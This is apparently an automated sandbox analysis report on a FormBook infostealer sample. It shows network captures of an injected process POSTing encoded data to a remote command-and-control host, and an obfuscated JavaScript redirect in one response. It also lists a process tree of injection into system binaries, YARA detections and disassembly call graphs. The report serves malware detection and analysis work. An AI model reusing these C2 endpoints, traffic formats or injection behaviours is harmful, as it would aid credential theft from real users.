                                                                            Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.849739154.88.22.101805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:35.746030092 CET745OUTPOST /jhb8/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Origin: http://www.t91rl7.pro
                                                                            Referer: http://www.t91rl7.pro/jhb8/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 32 4f 65 33 43 68 30 65 7a 57 38 71 56 6b 44 6c 4f 61 31 4a 78 4c 47 75 52 2b 31 38 48 68 48 46 31 6e 41 76 6b 6b 3d
                                                                            Data Ascii: jNn=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/T2Oe3Ch0ezW8qVkDlOa1JxLGuR+18HhHF1nAvkk=
                                                                            Jan 11, 2025 03:32:36.631516933 CET364INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:36 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 55 9e 55 3e 79 81 a6 be e1 39 86 29 95 a6 e5 c9 b9 16 66 fe 21 e9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 96 c0 e2 a3 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FUU>y9)f!6PZ0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.2.849740154.88.22.101805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:38.302222967 CET765OUTPOST /jhb8/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Origin: http://www.t91rl7.pro
                                                                            Referer: http://www.t91rl7.pro/jhb8/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6a 74 75 53 57 44 35 77 38 76 66 57 33 77 78 7a 79 48 53 54 37 61 58 57 52 5a 66 38 51 74 53 55 75 43 34 69 58 34
                                                                            Data Ascii: jNn=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxjtuSWD5w8vfW3wxzyHST7aXWRZf8QtSUuC4iX4
                                                                            Jan 11, 2025 03:32:39.172046900 CET364INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:39 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 55 9e 55 3e 79 81 a6 be e1 39 86 29 95 a6 e5 c9 b9 16 66 fe 21 e9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 96 c0 e2 a3 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FUU>y9)f!6PZ0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.2.849741154.88.22.101805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:40.850877047 CET1782OUTPOST /jhb8/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Origin: http://www.t91rl7.pro
                                                                            Referer: http://www.t91rl7.pro/jhb8/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 69 48 75 31 45 65 37 59 57 6e 49 67 7a 6c 69 67 32 55 39 78 55 4c 41 55 6e 37 32 77 6a 70 46 6e 33 6d 41 47 4d 58 51 63 35 67 45 43 4b 6d 70 6c 75 48 45 45 77 73 66 50 37 63 4f 6f 30 63 4f 6b 61 35 64 6b 66 41 51 6f 65 6c 6b 66 33 71 67 59 74 2b 76 4b 61 59 2f 54 50 70 7a 72 4b 77 72 2b 69 44 2b 57 65 4c 51 55 2b 6d 77 53 56 6f 2f 4e 56 46 37 5a 74 74 72 2f 58 61 57 55 52 46 53 4b 44 61 62 56 4f 36 61 30 43 68 66 6b 50 48 65 31 35 4c 73 6a 73 4b 56 51 44 58 31 6d 38 51 55 50 43 4e 5a 46 [TRUNCATED]
                                                                            Data Ascii: jNn=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxiHu1Ee7YWnIgzlig2U9xULAUn72wjpFn3mAGMXQc5gECKmpluHEEwsfP7cOo0cOka5dkfAQoelkf3qgYt+vKaY/TPpzrKwr+iD+WeLQU+mwSVo/NVF7Zttr/XaWURFSKDabVO6a0ChfkPHe15LsjsKVQDX1m8QUPCNZFvB4xMfFuWfhj/742OnP/VhvklvvYdLEY5pE1p01QtJ95jQVCd0E5GO1o882pc4M0pD12z1+pKhTaoVYy+24JADdlPAP25Fo5aFxUphsXAr3pYmZY7KFN2MtniQMopZgXN1a60exWORh2owbboRWn72Kih5rCgq3js936XIA2xgsmHrhlb8xW5t1Ixd0cc1bkW1ksXkB2cHCP+aVFGW9ybbbtPjSDPnFouWxGe5trEAn7qe6vs7yREQOWkdRINDWAzz1cw2YHs3VS9RwtQJBhnno5RVKpOVtfSYpHzjC+10hBPTVfultGzubPvyPWtj3pz7aCI+Eza3ERx1fYcTpFIVGHBtaia/y8dsNPYcHphPTVCyq8l40xwwlV0SDiuf7MG9PEa0+xt3DwhVA67b3MwcQVIVcOuF4TV15mblj7O4d8BNI+E2bb7Zqkbbfk4//pHhheNp1Ms36BGgf11sBQPYFCWkC6aQLMpM9dunVvPx22uzrGiS/Li6IJoJU8avDiTOsKjSnkXmXU0xYrfIHjpfpydn5tA/pJq8OLvaecxvW19deNLkCtgSZP/REUg8Yk0L2mL4BbuWYl0fnq9rfZI+59NaUO5NXa8ptOKTStXRMyO8hhNxel2lD1+0uXISITI1KH7sTzQNvGiz2nrsPReAK6Syn0ad2SKp [TRUNCATED]
                                                                            Jan 11, 2025 03:32:41.713254929 CET364INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:41 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 55 9e 55 3e 79 81 a6 be e1 39 86 29 95 a6 e5 c9 b9 16 66 fe 21 e9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 96 c0 e2 a3 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>FUU>y9)f!6PZ0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.2.849742154.88.22.101805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:32:43.389837980 CET488OUTGET /jhb8/?jNn=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0JB40X+6ZYpMJWzP2nxEXACS3GxK9okeiaSzZusyrXZl7w==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.t91rl7.pro
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:32:44.250277042 CET332INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:32:44 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 32 59 7a 49 7a 4c 6e 51 35 4d 57 6c 31 64 79 35 77 63 6d 38 36 4f 54 67 78 4d 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly82YzIzLnQ5MWl1dy5wcm86OTgxMQ=c=')</script>0


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:21:28:58
                                                                            Start date:10/01/2025
                                                                            Path:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\1SxKeB4u0c.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'794'048 bytes
                                                                            MD5 hash:897FF2A936F11B8F74F56E0C835A2C43
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:21:28:58
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'658'880 bytes
                                                                            MD5 hash:C14356FC1BFD5700FA1D54D53D65507C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:3
                                                                            Start time:21:28:58
                                                                            Start date:10/01/2025
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\1SxKeB4u0c.exe"
                                                                            Imagebase:0xf50000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:21:28:59
                                                                            Start date:10/01/2025
                                                                            Path:C:\Windows\System32\alg.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\alg.exe
                                                                            Imagebase:0x140000000
                                                                            File size:1'594'368 bytes
                                                                            MD5 hash:212514466AE3CEB072CE28C89C73B2D2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:6
                                                                            Start time:21:29:15
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe"
                                                                            Imagebase:0x130000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:7
                                                                            Start time:21:29:17
                                                                            Start date:10/01/2025
                                                                            Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                                            Imagebase:0x620000
                                                                            File size:186'880 bytes
                                                                            MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:21:29:30
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe"
                                                                            Imagebase:0x130000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:10
                                                                            Start time:21:29:42
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6d20e0000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:3.6%
                                                                              Dynamic/Decrypted Code Coverage:6.8%
                                                                              Signature Coverage:9%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:63
                                                                              execution_graph 108594 2f1aaf0 108595 2f1ab06 108594->108595 108599 2f1ab57 108595->108599 108600 2f16490 108595->108600 108602 2f15f10 108600->108602 108603 2f15d90 108600->108603 108601 2f16084 SetFilePointerEx 108601->108602 108602->108601 108602->108603 108604 2f4faf0 108603->108604 108605 2f4fafd 108604->108605 108606 2f4fb84 108604->108606 108605->108606 108611 2f4fb2a 108605->108611 108607 2f4fc05 108606->108607 108617 2f4fbda 108606->108617 108609 2f4fc38 108607->108609 108622 2f50fe0 21 API calls __startOneArgErrorHandling 108607->108622 108609->108599 108610 2f5032f 108610->108599 108611->108610 108623 2f51a1b 21 API calls 2 library calls 108611->108623 108612 2f508d6 108612->108599 108614 2f4fc22 108614->108599 108615 2f51167 108624 2f50ff7 21 API calls __startOneArgErrorHandling 108615->108624 108616 2f5116e 108625 2f50fe0 21 API calls __startOneArgErrorHandling 108616->108625 108617->108609 108617->108615 108617->108616 108620 2f5116c 108620->108599 108621 2f51173 108621->108599 108622->108614 108623->108612 108624->108620 108625->108621 108626 43fe27 108639 41f944 108626->108639 108628 43fe3d 108629 43fe53 108628->108629 108631 43febe 108628->108631 108728 409e5d 60 API calls 108629->108728 108648 40fce0 108631->108648 108632 43fe92 108634 44089c 108632->108634 108635 43fe9a 108632->108635 108730 469e4a 89 API calls 4 library calls 108634->108730 108729 46834f 59 API calls Mailbox 108635->108729 108638 43feb2 Mailbox 108640 41f950 108639->108640 108641 41f962 108639->108641 108731 409d3c 60 API calls Mailbox 108640->108731 108643 41f991 108641->108643 108644 41f968 108641->108644 108742 409d3c 60 API calls Mailbox 108643->108742 108732 420db6 108644->108732 108647 41f95a 108647->108628 108771 408180 108648->108771 108650 40fd3d 108652 44472d 108650->108652 108711 4106f6 108650->108711 108776 40f234 108650->108776 108894 469e4a 89 API calls 4 library calls 108652->108894 108655 44488d 108659 444742 108655->108659 108660 40fe4c 108655->108660 108900 47a2d9 85 API calls Mailbox 108655->108900 108656 40fe3e 108656->108655 108656->108660 108898 4566ec 59 API calls 2 library calls 108656->108898 108657 410517 108666 420db6 Mailbox 59 API calls 108657->108666 108667 4448f9 108660->108667 108715 444b53 108660->108715 108780 40837c 108660->108780 108661 4447d7 108661->108659 108896 469e4a 89 API calls 4 library calls 108661->108896 108663 444848 108899 4560ef 59 API calls 2 library calls 108663->108899 108674 410545 _memmove 108666->108674 108675 444917 108667->108675 108902 4085c0 59 API calls Mailbox 108667->108902 108669 444755 108669->108661 108895 40f6a3 331 API calls 108669->108895 108672 4448b2 Mailbox 108672->108660 108901 4566ec 59 API calls 2 library calls 108672->108901 108682 420db6 Mailbox 59 API calls 108674->108682 108681 444928 108675->108681 108903 4085c0 59 API calls Mailbox 108675->108903 108676 40fea4 108685 444ad6 108676->108685 108686 40ff32 108676->108686 108720 410179 Mailbox _memmove 108676->108720 108677 44486b 108678 409ea0 331 API calls 108677->108678 108678->108655 108679 420db6 59 API calls Mailbox 108689 40fdd3 108679->108689 108681->108720 108904 4560ab 59 API calls Mailbox 108681->108904 108726 410106 _memmove 108682->108726 108913 469ae7 60 API calls 108685->108913 108687 420db6 Mailbox 59 API calls 108686->108687 108691 40ff39 108687->108691 108689->108656 108689->108657 108689->108659 108689->108669 108689->108674 108689->108679 108702 44480c 108689->108702 108868 409ea0 108689->108868 108691->108711 108787 4109d0 108691->108787 108693 444a4d 108694 409ea0 331 API calls 108693->108694 108696 444a87 108694->108696 108696->108659 108908 4084c0 108696->108908 108698 40ffb2 108698->108674 108705 40ffe6 108698->108705 108698->108711 108897 469e4a 89 API calls 4 library calls 108702->108897 108703 444ab2 108912 469e4a 89 API calls 4 library calls 108703->108912 108713 410007 108705->108713 108914 408047 108705->108914 108709 420db6 59 API calls Mailbox 108709->108720 108893 469e4a 89 API calls 4 library calls 108711->108893 108712 410398 108712->108638 108713->108711 108714 444b24 108713->108714 108717 41004c 108713->108717 108918 409d3c 60 API calls Mailbox 108714->108918 108715->108659 108919 469e4a 89 API calls 4 library calls 108715->108919 108717->108711 108717->108715 108718 4100d8 108717->108718 108864 409d3c 60 API calls Mailbox 108718->108864 108720->108693 108720->108703 108720->108709 108720->108711 108720->108712 108721 444a1c 108720->108721 108866 408740 68 API calls __cinit 108720->108866 108867 408660 68 API calls 108720->108867 108905 465937 68 API calls 108720->108905 108906 4089b3 69 API calls Mailbox 108720->108906 108907 409d3c 60 API calls Mailbox 108720->108907 108724 420db6 Mailbox 59 API calls 108721->108724 108722 4100eb 108722->108711 108865 4082df 59 API calls Mailbox 108722->108865 108724->108693 108726->108720 108727 410162 108726->108727 108892 409c90 59 API calls Mailbox 108726->108892 108727->108638 108728->108632 108729->108638 108730->108638 108731->108647 108735 420dbe 108732->108735 108734 420dd8 108734->108647 108735->108734 108737 420ddc std::exception::exception 108735->108737 108743 42571c 108735->108743 108760 4233a1 DecodePointer 108735->108760 108761 42859b RaiseException 108737->108761 108739 420e06 108762 4284d1 58 API calls _free 108739->108762 108741 420e18 108741->108647 108742->108647 108744 425797 108743->108744 108752 425728 108743->108752 108769 4233a1 DecodePointer 108744->108769 108746 42579d 108770 428b28 58 API calls __getptd_noexit 108746->108770 108749 42575b RtlAllocateHeap 108749->108752 108759 42578f 108749->108759 108751 425783 108767 428b28 58 API calls __getptd_noexit 108751->108767 108752->108749 108752->108751 108756 425781 108752->108756 108757 425733 108752->108757 108766 4233a1 DecodePointer 108752->108766 108768 428b28 58 API calls __getptd_noexit 108756->108768 108757->108752 108763 42a16b 58 API calls 2 library calls 108757->108763 108764 42a1c8 58 API calls 6 library calls 108757->108764 108765 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108757->108765 108759->108735 108760->108735 108761->108739 108762->108741 108763->108757 108764->108757 108766->108752 108767->108756 108768->108759 108769->108746 108770->108759 108772 40818f 108771->108772 108775 4081aa 108771->108775 108920 407e4f 108772->108920 108774 408197 CharUpperBuffW 108774->108775 108775->108650 108777 40f251 